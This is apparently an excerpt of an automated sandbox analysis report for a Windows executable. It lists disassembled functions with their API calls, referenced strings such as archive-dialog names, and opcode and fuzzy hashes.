              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProc
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 4061214504-1276376045
              • Opcode ID: c7af48f3b96218b1d123f974b73df8b30ff5bf0fc8b129ac4b21d4ec6725ffae
              • Instruction ID: 705e39bedb163fa2af9698e622cb27d2ac74c275cead5606a8277ebc7aa1a893
              • Opcode Fuzzy Hash: c7af48f3b96218b1d123f974b73df8b30ff5bf0fc8b129ac4b21d4ec6725ffae
              • Instruction Fuzzy Hash: 6FF04F30A18618BBDB159F99DC09B9EBFB9FF84712F004168F805E6250EF748A80CA94
              APIs
                • Part of subcall function 00810085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008100A0
                • Part of subcall function 00810085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0080EB86,Crypt32.dll,00000000,0080EC0A,?,?,0080EBEC,?,?,?), ref: 008100C2
              • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0080EB92
              • GetProcAddress.KERNEL32(008481C0,CryptUnprotectMemory), ref: 0080EBA2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AddressProc$DirectoryLibraryLoadSystem
              • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
              • API String ID: 2141747552-1753850145
              • Opcode ID: 9f481e867d4dc5f9c157f9fd44577b35189ea41b4a1c96dad927b548692f93fa
              • Instruction ID: dbe0a65df478027e8db51fad23d8cfd2030b10128c89012514ec034da91ca0b4
              • Opcode Fuzzy Hash: 9f481e867d4dc5f9c157f9fd44577b35189ea41b4a1c96dad927b548692f93fa
              • Instruction Fuzzy Hash: 78E01A70900B41EEDB309B28DC18B42BEE4BB55711F048C5DA8A6E3280D6B9D5808B90
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: c7239e91dc4b8e75b7bd68620bf733a0b1c225514d91f35cd8ed0ac141abc930
              • Instruction ID: c9883b855f02373aca257f138796ba21a733f31b9a96e2b5ed18aa6d3c5d6859
              • Opcode Fuzzy Hash: c7239e91dc4b8e75b7bd68620bf733a0b1c225514d91f35cd8ed0ac141abc930
              • Instruction Fuzzy Hash: 5A41F336A003149BCB10DF79D881A9EB7B6FF84714B1645A8E915EB281EB30AD81CB81
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 0082B619
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0082B63C
                • Part of subcall function 00828518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0082C13D,00000000,?,008267E2,?,00000008,?,008289AD,?,?,?), ref: 0082854A
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0082B662
              • _free.LIBCMT ref: 0082B675
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0082B684
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
              • String ID:
              • API String ID: 336800556-0
              • Opcode ID: 3fff11926300d5982f6238d30aecbb543ad5dad5a651cbe7ab95dc391805d3dc
              • Instruction ID: 39abe5d3afb9b8447fd916ecf7df70b1f867235368526711d88627ac18f62c65
              • Opcode Fuzzy Hash: 3fff11926300d5982f6238d30aecbb543ad5dad5a651cbe7ab95dc391805d3dc
              • Instruction Fuzzy Hash: 2101B1A2A03225BF2721167A7C88C7B6B6DFED6BA13140628B904D2110DF618D41A1B0
              APIs
              • GetLastError.KERNEL32(?,00840EE8,00000200,0082895F,008258FE,?,?,?,?,0080D25E,?,033D1BF8,00000063,00000004,0080CFE0,?), ref: 0082902E
              • _free.LIBCMT ref: 00829063
              • _free.LIBCMT ref: 0082908A
              • SetLastError.KERNEL32(00000000,00833958,00000050,00840EE8), ref: 00829097
              • SetLastError.KERNEL32(00000000,00833958,00000050,00840EE8), ref: 008290A0
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: 38dc8400553abfbf76d73a194ed01b2bc283c9990cee5247ea10835ea838e0f5
              • Instruction ID: 63e7ff830bbaa57fdbfdf02c5301dad25024cc1d4ac659b4bde531b32100616f
              • Opcode Fuzzy Hash: 38dc8400553abfbf76d73a194ed01b2bc283c9990cee5247ea10835ea838e0f5
              • Instruction Fuzzy Hash: 61017872102F38AB9732637C7C8592B261DFFD0771B210428F555D2292EF30CCC14066
              APIs
                • Part of subcall function 00810A41: ResetEvent.KERNEL32(?), ref: 00810A53
                • Part of subcall function 00810A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00810A67
              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0081078F
              • CloseHandle.KERNEL32(?,?), ref: 008107A9
              • DeleteCriticalSection.KERNEL32(?), ref: 008107C2
              • CloseHandle.KERNEL32(?), ref: 008107CE
              • CloseHandle.KERNEL32(?), ref: 008107DA
                • Part of subcall function 0081084E: WaitForSingleObject.KERNEL32(?,000000FF,00810A78,?), ref: 00810854
                • Part of subcall function 0081084E: GetLastError.KERNEL32(?), ref: 00810860
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
              • String ID:
              • API String ID: 1868215902-0
              • Opcode ID: 573d7ab599737118bbc22105116debb2e23db4a3eff3a9314b040afd82e7fc15
              • Instruction ID: 32d3afb4d7fe28eb19913f985e70bc0ae6d00c48f874f918b2199ecc782ac617
              • Opcode Fuzzy Hash: 573d7ab599737118bbc22105116debb2e23db4a3eff3a9314b040afd82e7fc15
              • Instruction Fuzzy Hash: C4015275544B04EBC7269B69DD84FC6BBEDFF89711F000929F15A821A0CBB66A84CF90
              APIs
              • _free.LIBCMT ref: 0082BF28
                • Part of subcall function 008284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958), ref: 008284F4
                • Part of subcall function 008284DE: GetLastError.KERNEL32(00833958,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958,00833958), ref: 00828506
              • _free.LIBCMT ref: 0082BF3A
              • _free.LIBCMT ref: 0082BF4C
              • _free.LIBCMT ref: 0082BF5E
              • _free.LIBCMT ref: 0082BF70
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 97582e563593e6ccdbdf06fcb6c6ba7da651d034db732582fce688cdcb6d809a
              • Instruction ID: a0b0602218624f10219e9936ecd185d630747d3d169d55386a6be19246685f95
              • Opcode Fuzzy Hash: 97582e563593e6ccdbdf06fcb6c6ba7da651d034db732582fce688cdcb6d809a
              • Instruction Fuzzy Hash: F5F0F93250A625EB8A20EB6CFE86C1A73E9FA407107644C89F048D7990CF30FCC08E69
              APIs
              • _free.LIBCMT ref: 0082807E
                • Part of subcall function 008284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958), ref: 008284F4
                • Part of subcall function 008284DE: GetLastError.KERNEL32(00833958,?,0082BFA7,00833958,00000000,00833958,00000000,?,0082BFCE,00833958,00000007,00833958,?,0082C3CB,00833958,00833958), ref: 00828506
              • _free.LIBCMT ref: 00828090
              • _free.LIBCMT ref: 008280A3
              • _free.LIBCMT ref: 008280B4
              • _free.LIBCMT ref: 008280C5
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: e4bf1587d0553b5abb6e9663881b49195b55e8f9cffec5122d31ad09ad3c092a
              • Instruction ID: 98009d62b970563e13c913c4f449ea61e4f324a0f2f689422f6fd26481f588fd
              • Opcode Fuzzy Hash: e4bf1587d0553b5abb6e9663881b49195b55e8f9cffec5122d31ad09ad3c092a
              • Instruction Fuzzy Hash: 61F01778806525CB8F91BB19FC194053A65F72472030E668AF401DABB2CF710895AFC6
              APIs
              • __EH_prolog.LIBCMT ref: 00807579
                • Part of subcall function 00803B3D: __EH_prolog.LIBCMT ref: 00803B42
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00807640
                • Part of subcall function 00807BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00807C04
                • Part of subcall function 00807BF5: GetLastError.KERNEL32 ref: 00807C4A
                • Part of subcall function 00807BF5: CloseHandle.KERNEL32(?), ref: 00807C59
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
              • String ID: SeRestorePrivilege$SeSecurityPrivilege
              • API String ID: 3813983858-639343689
              • Opcode ID: 2109b0d8ec60a1dfef58fff888666c2a9b19ecc666e6340a0583bac0347116fb
              • Instruction ID: df5ded5e0c0654097335e045250463a2f682e9242e5fb1454708a5bdd28dcd8b
              • Opcode Fuzzy Hash: 2109b0d8ec60a1dfef58fff888666c2a9b19ecc666e6340a0583bac0347116fb
              • Instruction Fuzzy Hash: 0E31D070E08248AEDF60EB689C05BEEBB78FF65314F000065F455E71D2CBB15A44CBA2
              APIs
                • Part of subcall function 0080130B: GetDlgItem.USER32(00000000,00003021), ref: 0080134F
                • Part of subcall function 0080130B: SetWindowTextW.USER32(00000000,008335B4), ref: 00801365
              • EndDialog.USER32(?,00000001), ref: 0081A4B8
              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0081A4CD
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0081A4E2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: ASKNEXTVOL
              • API String ID: 445417207-3402441367
              • Opcode ID: a9cf6412d5f8c7686cafd636b0b9113d7c9f28f5868d678bea084a8c1878f78a
              • Instruction ID: 07d8326c5bcd8935e478f493ceb650e1f128af5995360271ef3d056924ae747e
              • Opcode Fuzzy Hash: a9cf6412d5f8c7686cafd636b0b9113d7c9f28f5868d678bea084a8c1878f78a
              • Instruction Fuzzy Hash: C111D032245600AFEA259FA8DD0DFA637AEFF4A700F150044F240DB1A0C7E69981DB2B
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: __fprintf_l_strncpy
              • String ID: $%s$@%s
              • API String ID: 1857242416-834177443
              • Opcode ID: d155a5547205f9f67ef2bcea426107322b02e3e136a907f0f58220c20c22b589
              • Instruction ID: 6b62111ef8161bbefc905a098aa69ddf8df3a511c818a690f7960b0780dd1927
              • Opcode Fuzzy Hash: d155a5547205f9f67ef2bcea426107322b02e3e136a907f0f58220c20c22b589
              • Instruction Fuzzy Hash: 45215E7244030CAAEB609EA4CD06FEA7BA8FF05300F044512FE14D61D2D775EA559B51
              APIs
                • Part of subcall function 0080130B: GetDlgItem.USER32(00000000,00003021), ref: 0080134F
                • Part of subcall function 0080130B: SetWindowTextW.USER32(00000000,008335B4), ref: 00801365
              • EndDialog.USER32(?,00000001), ref: 0081A9DE
              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0081A9F6
              • SetDlgItemTextW.USER32(?,00000067,?), ref: 0081AA24
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: GETPASSWORD1
              • API String ID: 445417207-3292211884
              • Opcode ID: f06e5e2c5ad83caf4e1c2f33d2e80c30310a6572b21307f3cd25add82e127a8d
              • Instruction ID: e17bdbadfcd37f845751dcfc4f08e0cc2570bf963272384a2f27e8ce75816eff
              • Opcode Fuzzy Hash: f06e5e2c5ad83caf4e1c2f33d2e80c30310a6572b21307f3cd25add82e127a8d
              • Instruction Fuzzy Hash: FF1148329411287ADB259A64DD09FFB3B2CFF49711F010051FA49F20C1C2A599D4D6A3
              APIs
              • _swprintf.LIBCMT ref: 0080B51E
                • Part of subcall function 0080400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0080401D
              • _wcschr.LIBVCRUNTIME ref: 0080B53C
              • _wcschr.LIBVCRUNTIME ref: 0080B54C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: _wcschr$__vswprintf_c_l_swprintf
              • String ID: %c:\
              • API String ID: 525462905-3142399695
              • Opcode ID: 8635a227f8784293a1e70148c4eda10aaae5b9b64d74ffb71216c580e7576d47
              • Instruction ID: f91bfc125c6c34613d1f5ef498ce81da23324c0e9c9505a94292a7212faf1bec
              • Opcode Fuzzy Hash: 8635a227f8784293a1e70148c4eda10aaae5b9b64d74ffb71216c580e7576d47
              • Instruction Fuzzy Hash: D6012D73A44311BACB606BB9AC47C2BB7ACFF953A0B504466F945C70C1FB34D950C2A2
              APIs
              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0080ABC5,00000008,?,00000000,?,0080CB88,?,00000000), ref: 008106F3
              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0080ABC5,00000008,?,00000000,?,0080CB88,?,00000000), ref: 008106FD
              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0080ABC5,00000008,?,00000000,?,0080CB88,?,00000000), ref: 0081070D
              Strings
              • Thread pool initialization failed., xrefs: 00810725
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: Create$CriticalEventInitializeSectionSemaphore
              • String ID: Thread pool initialization failed.
              • API String ID: 3340455307-2182114853
              • Opcode ID: 38b206d4864429c29e4c04d5d507add420814baf3edc3e67a0e483c3e87107b7
              • Instruction ID: 732f23ad47527b92aed93fdc1b2daa8139aa0399b2e93f2eca985384e469f49d
              • Opcode Fuzzy Hash: 38b206d4864429c29e4c04d5d507add420814baf3edc3e67a0e483c3e87107b7
              • Instruction Fuzzy Hash: 89116AB1500708AFC3215F658C84AA7FBECFFA4745F20482EE1DAC6240D6B169808B60
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID:
              • String ID: RENAMEDLG$REPLACEFILEDLG
              • API String ID: 0-56093855
              • Opcode ID: 5b48d1c77c74e3fa1724cbc8a3e6e25b897b9a2fcce0ec09431f73f8caf501eb
              • Instruction ID: 8605a950e73d2c786532c58f81cb38e2af7526154b00985833d2e3ea4d27b3ac
              • Opcode Fuzzy Hash: 5b48d1c77c74e3fa1724cbc8a3e6e25b897b9a2fcce0ec09431f73f8caf501eb
              • Instruction Fuzzy Hash: E301B175600349AFCB119F58ED04F9A7BADFB09385F044421F905D2330DA75AC90EBA5
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: __alldvrm$_strrchr
              • String ID:
              • API String ID: 1036877536-0
              • Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
              • Instruction ID: 18e3c35addeb67f79034d2a197c56dbacb889717e56f3cd496100ee07cb51188
              • Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
              • Instruction Fuzzy Hash: 3CA155729003A69FEB21DE68E8917AEBBA5FF51310F14416DE8D9DB381C23898C2C755
              APIs
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,008080B7,?,?,?), ref: 0080A351
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,008080B7,?,?), ref: 0080A395
              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,008080B7,?,?,?,?,?,?,?,?), ref: 0080A416
              • CloseHandle.KERNEL32(?,?,00000000,?,008080B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0080A41D
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: File$Create$CloseHandleTime
              • String ID:
              • API String ID: 2287278272-0
